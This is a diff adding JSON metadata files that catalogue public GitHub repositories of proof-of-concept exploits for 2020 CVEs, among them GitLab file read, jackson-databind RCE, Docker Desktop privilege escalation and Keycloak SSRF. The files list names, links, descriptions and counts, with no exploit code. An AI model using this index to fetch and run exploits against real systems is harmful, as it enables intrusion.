b/2020/CVE-2020-10558.json new file mode 100644 index 0000000000..bd9493adb4 --- /dev/null +++ b/2020/CVE-2020-10558.json @@ -0,0 +1,73 @@ +[ + { + "id": 247770275, + "name": "CVE-2020-10558", + "full_name": "nullze\/CVE-2020-10558", + "owner": { + "login": "nullze", + "id": 57538995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57538995?v=4", + "html_url": "https:\/\/github.com\/nullze", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nullze\/CVE-2020-10558", + "description": "Tesla Hack All Vehicles DoS Infotainment Touchscreen Interface CVE-2020-10558", + "fork": false, + "created_at": "2020-03-16T16:55:18Z", + "updated_at": "2024-08-12T19:58:52Z", + "pushed_at": "2024-05-17T05:50:52Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "3", + "cve-2020-10558", + "exploit", + "hack", + "hacking", + "model", + "nist", + "tesla" + ], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 380652459, + "name": "Tesla-CVE-2020-10558", + "full_name": "AmazingOut\/Tesla-CVE-2020-10558", + "owner": { + "login": "AmazingOut", + "id": 41768430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41768430?v=4", + "html_url": "https:\/\/github.com\/AmazingOut", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AmazingOut\/Tesla-CVE-2020-10558", + "description": "TESLA MODEL 3 HACK", + "fork": false, + "created_at": "2021-06-27T04:46:01Z", + "updated_at": "2021-06-27T04:48:33Z", + "pushed_at": "2021-06-27T04:48:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10560.json b/2020/CVE-2020-10560.json new file mode 100644 index 0000000000..97d2dbeae0 --- /dev/null +++ b/2020/CVE-2020-10560.json @@ -0,0 +1,64 @@ +[ + { + "id": 246300718, + "name": "CVE-2020-10560-Key-Recovery", + "full_name": "alex-seymour\/CVE-2020-10560-Key-Recovery", + "owner": { + "login": "alex-seymour", + "id": 25187197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25187197?v=4", + "html_url": "https:\/\/github.com\/alex-seymour", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alex-seymour\/CVE-2020-10560-Key-Recovery", + "description": null, + "fork": false, + "created_at": "2020-03-10T12:55:06Z", + "updated_at": "2024-08-12T19:58:34Z", + "pushed_at": "2020-03-28T23:37:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 250903418, + "name": "CVE-2020-10560", + "full_name": "kevthehermit\/CVE-2020-10560", + "owner": { + "login": "kevthehermit", + "id": 2545096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2545096?v=4", + "html_url": "https:\/\/github.com\/kevthehermit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kevthehermit\/CVE-2020-10560", + "description": "CVE-2020-10560 OSSN Arbitrary File Read", + "fork": false, + "created_at": "2020-03-28T22:09:39Z", + "updated_at": "2024-08-12T19:59:24Z", + "pushed_at": "2023-10-27T00:56:08Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10596.json b/2020/CVE-2020-10596.json new file mode 100644 index 0000000000..01fb174ada --- /dev/null +++ b/2020/CVE-2020-10596.json @@ -0,0 +1,64 @@ +[ + { + "id": 786354689, + "name": "CVE-2020-10596-2", + "full_name": "miguelc49\/CVE-2020-10596-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2020-10596-2", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:12Z", + "updated_at": "2024-04-14T17:38:28Z", + "pushed_at": "2024-04-14T17:38:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786354704, + "name": "CVE-2020-10596-1", + "full_name": "miguelc49\/CVE-2020-10596-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2020-10596-1", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:15Z", + "updated_at": "2024-04-14T17:38:06Z", + "pushed_at": "2024-04-14T17:38:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1066.json b/2020/CVE-2020-1066.json new file mode 100644 index 0000000000..49609e95fd --- /dev/null +++ b/2020/CVE-2020-1066.json @@ -0,0 +1,64 @@ +[ + { + "id": 268427056, + "name": "CVE-2020-1066-EXP", + "full_name": "cbwang505\/CVE-2020-1066-EXP", + "owner": { + "login": "cbwang505", + "id": 4487329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4487329?v=4", + "html_url": "https:\/\/github.com\/cbwang505", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cbwang505\/CVE-2020-1066-EXP", + "description": "CVE-2020-1066-EXP支持Windows 7和Windows Server 2008 R2操作系统", + "fork": false, + "created_at": "2020-06-01T04:44:05Z", + "updated_at": "2024-10-29T16:01:26Z", + "pushed_at": "2020-06-17T00:56:08Z", + "stargazers_count": 185, + "watchers_count": 185, + "has_discussions": false, + "forks_count": 44, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 44, + "watchers": 185, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 345279364, + "name": "cve-2020-1066", + "full_name": "xyddnljydd\/cve-2020-1066", + "owner": { + "login": "xyddnljydd", + "id": 28214509, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28214509?v=4", + "html_url": "https:\/\/github.com\/xyddnljydd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xyddnljydd\/cve-2020-1066", + "description": null, + "fork": false, + "created_at": "2021-03-07T06:55:26Z", + "updated_at": "2023-02-02T06:25:02Z", + "pushed_at": "2021-03-07T07:09:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10663.json b/2020/CVE-2020-10663.json new file mode 100644 index 0000000000..c5dc424dee --- /dev/null +++ b/2020/CVE-2020-10663.json @@ -0,0 +1,33 @@ +[ + { + "id": 249670608, + "name": "json_cve_2020_10663", + "full_name": "rails-lts\/json_cve_2020_10663", + "owner": { + "login": "rails-lts", + "id": 59083139, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59083139?v=4", + "html_url": "https:\/\/github.com\/rails-lts", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rails-lts\/json_cve_2020_10663", + "description": "Workaround for CVE-2020-10663 (vulnerability in json gem)", + "fork": false, + "created_at": "2020-03-24T09:53:23Z", + "updated_at": "2024-08-12T19:59:11Z", + "pushed_at": "2024-02-23T08:56:14Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10665.json b/2020/CVE-2020-10665.json new file mode 100644 index 0000000000..e87b5c3120 --- /dev/null +++ b/2020/CVE-2020-10665.json @@ -0,0 +1,33 @@ +[ + { + "id": 274855858, + "name": "CVE-2020-10665", + "full_name": "spaceraccoon\/CVE-2020-10665", + "owner": { + "login": "spaceraccoon", + "id": 18413849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18413849?v=4", + "html_url": "https:\/\/github.com\/spaceraccoon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/spaceraccoon\/CVE-2020-10665", + "description": "POC for CVE-2020-10665 Docker Desktop Local Privilege Escalation", + "fork": false, + "created_at": "2020-06-25T07:35:29Z", + "updated_at": "2024-08-12T20:03:03Z", + "pushed_at": "2020-06-25T07:49:34Z", + "stargazers_count": 53, + "watchers_count": 53, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 53, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10673.json b/2020/CVE-2020-10673.json new file mode 100644 index 0000000000..5f848bc34f --- /dev/null +++ b/2020/CVE-2020-10673.json @@ -0,0 +1,68 @@ +[ + { + "id": 249413535, + "name": "CVE-2020-10673", + "full_name": "harry1080\/CVE-2020-10673", + "owner": { + "login": "harry1080", + "id": 19358692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19358692?v=4", + "html_url": "https:\/\/github.com\/harry1080", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/harry1080\/CVE-2020-10673", + "description": "CVE-2020-10673", + "fork": false, + "created_at": "2020-03-23T11:34:48Z", + "updated_at": "2021-04-19T14:16:13Z", + "pushed_at": "2020-03-23T11:25:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 265876544, + "name": "CVE-2020-10673", + "full_name": "Al1ex\/CVE-2020-10673", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-10673", + "description": "CVE-2020-10673:jackson-databind RCE", + "fork": false, + "created_at": "2020-05-21T14:56:30Z", + "updated_at": "2024-08-12T20:01:44Z", + "pushed_at": "2022-11-16T08:56:59Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-10673", + "jackson", + "rce" + ], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10713.json b/2020/CVE-2020-10713.json new file mode 100644 index 0000000000..3156231f09 --- /dev/null +++ b/2020/CVE-2020-10713.json @@ -0,0 +1,33 @@ +[ + { + "id": 283354389, + "name": "BootHole", + "full_name": "eclypsium\/BootHole", + "owner": { + "login": "eclypsium", + "id": 28793771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28793771?v=4", + "html_url": "https:\/\/github.com\/eclypsium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eclypsium\/BootHole", + "description": "BootHole vulnerability (CVE-2020-10713). detection script, links and other mitigation related materials", + "fork": false, + "created_at": "2020-07-29T00:01:41Z", + "updated_at": "2024-08-12T20:04:13Z", + "pushed_at": "2020-08-24T23:16:38Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 63, + "score": 0, + "subscribers_count": 13 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10749.json b/2020/CVE-2020-10749.json new file mode 100644 index 0000000000..7ba1219b81 --- /dev/null +++ b/2020/CVE-2020-10749.json @@ -0,0 +1,38 @@ +[ + { + "id": 271585011, + "name": "CVE-2020-10749", + "full_name": "knqyf263\/CVE-2020-10749", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2020-10749", + "description": "CVE-2020-10749 PoC (Kubernetes MitM attacks via IPv6 rogue router advertisements)", + "fork": false, + "created_at": "2020-06-11T15:42:18Z", + "updated_at": "2024-08-12T20:02:32Z", + "pushed_at": "2020-06-11T16:21:01Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "ipv6", + "kubernetes", + "vulnerability" + ], + "visibility": "public", + "forks": 14, + "watchers": 25, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10757.json b/2020/CVE-2020-10757.json new file mode 100644 index 0000000000..0f1225a35f --- /dev/null +++ b/2020/CVE-2020-10757.json @@ -0,0 +1,33 @@ +[ + { + "id": 475845386, + "name": "linux-4.19.72_CVE-2020-10757", + "full_name": "ShaikUsaf\/linux-4.19.72_CVE-2020-10757", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/linux-4.19.72_CVE-2020-10757", + "description": null, + "fork": false, + "created_at": "2022-03-30T11:21:21Z", + "updated_at": "2022-03-30T12:43:02Z", + "pushed_at": "2022-03-30T12:41:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10759.json b/2020/CVE-2020-10759.json new file mode 100644 index 0000000000..898492655b --- /dev/null +++ b/2020/CVE-2020-10759.json @@ -0,0 +1,33 @@ +[ + { + "id": 269869760, + "name": "CVE-2020-10759-poc", + "full_name": "justinsteven\/CVE-2020-10759-poc", + "owner": { + "login": "justinsteven", + "id": 1893909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1893909?v=4", + "html_url": "https:\/\/github.com\/justinsteven", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/justinsteven\/CVE-2020-10759-poc", + "description": "Proof of Concept for CVE-2020-10759 (fwupd signature validation bypass)", + "fork": false, + "created_at": "2020-06-06T04:44:38Z", + "updated_at": "2020-06-08T22:09:09Z", + "pushed_at": "2020-06-08T22:09:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10770.json b/2020/CVE-2020-10770.json new file mode 100644 index 0000000000..668862a739 --- /dev/null +++ b/2020/CVE-2020-10770.json @@ -0,0 +1,33 @@ +[ + { + "id": 416655831, + "name": "Keycloak-12.0.1-CVE-2020-10770", + "full_name": "ColdFusionX\/Keycloak-12.0.1-CVE-2020-10770", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/Keycloak-12.0.1-CVE-2020-10770", + "description": "Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated) ", + "fork": false, + "created_at": "2021-10-13T08:40:33Z", + "updated_at": "2024-08-12T20:17:13Z", + "pushed_at": "2022-07-11T05:31:21Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10882.json b/2020/CVE-2020-10882.json new file mode 100644 index 0000000000..88984cad4a --- /dev/null +++ b/2020/CVE-2020-10882.json @@ -0,0 +1,33 @@ +[ + { + "id": 582618116, + "name": "CVE-2020-10882", + "full_name": "lnversed\/CVE-2020-10882", + "owner": { + "login": "lnversed", + "id": 46649884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46649884?v=4", + "html_url": "https:\/\/github.com\/lnversed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lnversed\/CVE-2020-10882", + "description": "cve based on vulnerable cisco's Archer A7 routers", + "fork": false, + "created_at": "2022-12-27T11:32:56Z", + "updated_at": "2023-09-05T12:17:06Z", + "pushed_at": "2022-12-27T11:35:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10915.json b/2020/CVE-2020-10915.json new file mode 100644 index 0000000000..de9b4a78b9 --- /dev/null +++ b/2020/CVE-2020-10915.json @@ -0,0 +1,33 @@ +[ + { + "id": 419480084, + "name": "Modified-CVE-2020-10915-MsfModule", + "full_name": "Cinnamon1212\/Modified-CVE-2020-10915-MsfModule", + "owner": { + "login": "Cinnamon1212", + "id": 65077960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65077960?v=4", + "html_url": "https:\/\/github.com\/Cinnamon1212", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cinnamon1212\/Modified-CVE-2020-10915-MsfModule", + "description": "THIS IS NOT AN ORIGINAL EXPLOIT. THIS IS AN AUDITED VERSION FOR A THM BOX", + "fork": false, + "created_at": "2021-10-20T20:27:42Z", + "updated_at": "2021-10-20T20:31:52Z", + "pushed_at": "2021-10-20T20:31:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10963.json b/2020/CVE-2020-10963.json new file mode 100644 index 0000000000..f434042cd6 --- /dev/null +++ b/2020/CVE-2020-10963.json @@ -0,0 +1,33 @@ +[ + { + "id": 422615032, + "name": "CVE-2020-10963", + "full_name": "scopion\/CVE-2020-10963", + "owner": { + "login": "scopion", + "id": 27413591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27413591?v=4", + "html_url": "https:\/\/github.com\/scopion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scopion\/CVE-2020-10963", + "description": null, + "fork": false, + "created_at": "2021-10-29T14:56:05Z", + "updated_at": "2021-10-29T14:58:41Z", + "pushed_at": "2021-10-29T14:58:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10977.json b/2020/CVE-2020-10977.json new file mode 100644 index 0000000000..707fd4e80f --- /dev/null +++ b/2020/CVE-2020-10977.json @@ -0,0 +1,262 @@ +[ + { + "id": 260659368, + "name": "CVE-2020-10977", + "full_name": "KooroshRZ\/CVE-2020-10977", + "owner": { + "login": "KooroshRZ", + "id": 24431926, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24431926?v=4", + "html_url": "https:\/\/github.com\/KooroshRZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KooroshRZ\/CVE-2020-10977", + "description": "Exploit for \"GitLab Instance\" Arbitrary server file read vulnerability", + "fork": false, + "created_at": "2020-05-02T10:03:31Z", + "updated_at": "2021-03-30T01:51:50Z", + "pushed_at": "2020-05-15T08:30:48Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-10977", + "exploit", + "gitlab-instance", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 314596440, + "name": "cve-2020-10977", + "full_name": "thewhiteh4t\/cve-2020-10977", + "owner": { + "login": "thewhiteh4t", + "id": 36354846, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36354846?v=4", + "html_url": "https:\/\/github.com\/thewhiteh4t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thewhiteh4t\/cve-2020-10977", + "description": "GitLab 12.9.0 Arbitrary File Read ", + "fork": false, + "created_at": "2020-11-20T15:40:03Z", + "updated_at": "2024-10-01T08:41:40Z", + "pushed_at": "2021-04-23T19:21:16Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 69, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 316070312, + "name": "CVE-2020-10977.py", + "full_name": "JustMichi\/CVE-2020-10977.py", + "owner": { + "login": "JustMichi", + "id": 10670516, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10670516?v=4", + "html_url": "https:\/\/github.com\/JustMichi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JustMichi\/CVE-2020-10977.py", + "description": "authenticated arbitrary file read for Gitlab (CVE-2020-10977)", + "fork": false, + "created_at": "2020-11-25T22:48:26Z", + "updated_at": "2020-11-26T19:40:32Z", + "pushed_at": "2020-11-26T19:40:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 334197749, + "name": "gitlab-12.9.0-file-read", + "full_name": "erk3\/gitlab-12.9.0-file-read", + "owner": { + "login": "erk3", + "id": 3186136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3186136?v=4", + "html_url": "https:\/\/github.com\/erk3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erk3\/gitlab-12.9.0-file-read", + "description": "A (wanted to be) better script than what can be found on exploit-db about the authenticated arbitrary read file on GitLab v12.9.0 (CVE-2020-10977)", + "fork": false, + "created_at": "2021-01-29T16:17:10Z", + "updated_at": "2021-01-29T17:54:42Z", + "pushed_at": "2021-01-29T17:54:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 342445393, + "name": "cve-2020-10977", + "full_name": "possib1e\/cve-2020-10977", + "owner": { + "login": "possib1e", + "id": 30862319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30862319?v=4", + "html_url": "https:\/\/github.com\/possib1e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/possib1e\/cve-2020-10977", + "description": "GitLab 12.9 Arbitrary File Read", + "fork": false, + "created_at": "2021-02-26T02:57:05Z", + "updated_at": "2021-02-26T02:57:06Z", + "pushed_at": "2021-01-23T18:34:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 345284390, + "name": "CVE-2020-10977", + "full_name": "liath\/CVE-2020-10977", + "owner": { + "login": "liath", + "id": 1565435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1565435?v=4", + "html_url": "https:\/\/github.com\/liath", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/liath\/CVE-2020-10977", + "description": "Gitlab v12.4.0-8.1 RCE", + "fork": false, + "created_at": "2021-03-07T07:26:38Z", + "updated_at": "2021-03-25T07:02:30Z", + "pushed_at": "2021-03-07T07:28:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 356786384, + "name": "cve-2020-10977-read-and-execute", + "full_name": "lisp3r\/cve-2020-10977-read-and-execute", + "owner": { + "login": "lisp3r", + "id": 6272944, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6272944?v=4", + "html_url": "https:\/\/github.com\/lisp3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lisp3r\/cve-2020-10977-read-and-execute", + "description": "cve-2020-10977 read and execute", + "fork": false, + "created_at": "2021-04-11T06:31:06Z", + "updated_at": "2021-04-23T20:13:51Z", + "pushed_at": "2021-04-23T20:13:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 363605353, + "name": "gitlab-cve-2020-10977", + "full_name": "vandycknick\/gitlab-cve-2020-10977", + "owner": { + "login": "vandycknick", + "id": 6469315, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6469315?v=4", + "html_url": "https:\/\/github.com\/vandycknick", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vandycknick\/gitlab-cve-2020-10977", + "description": "GitLab Arbitrary File Read Exploit", + "fork": false, + "created_at": "2021-05-02T08:45:03Z", + "updated_at": "2024-01-07T16:17:25Z", + "pushed_at": "2021-05-04T22:25:51Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-10977", + "exploit", + "gitlab", + "lfi", + "python", + "rce" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11019.json b/2020/CVE-2020-11019.json new file mode 100644 index 0000000000..f1e81c05da --- /dev/null +++ b/2020/CVE-2020-11019.json @@ -0,0 +1,33 @@ +[ + { + "id": 602058639, + "name": "CVE-2020-11019", + "full_name": "Lixterclarixe\/CVE-2020-11019", + "owner": { + "login": "Lixterclarixe", + "id": 124773485, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124773485?v=4", + "html_url": "https:\/\/github.com\/Lixterclarixe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lixterclarixe\/CVE-2020-11019", + "description": "In FreeRDP less than or equal to 2.0.0, when running with logger set to \"WLOG_TRACE\", a possible crash of application could occur due to a read of an invalid array index. Data could be printed as string to local terminal. This has been fixed in 2.1.0. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-02-15T12:12:28Z", + "updated_at": "2023-02-20T16:18:44Z", + "pushed_at": "2023-01-27T19:28:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1102.json b/2020/CVE-2020-1102.json new file mode 100644 index 0000000000..52911cf664 --- /dev/null +++ b/2020/CVE-2020-1102.json @@ -0,0 +1,45 @@ +[ + { + "id": 255702097, + "name": "snyk-js-jquery-565129", + "full_name": "DanielRuf\/snyk-js-jquery-565129", + "owner": { + "login": "DanielRuf", + "id": 827205, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/827205?v=4", + "html_url": "https:\/\/github.com\/DanielRuf", + "user_view_type": "public" + }, + "html_url": 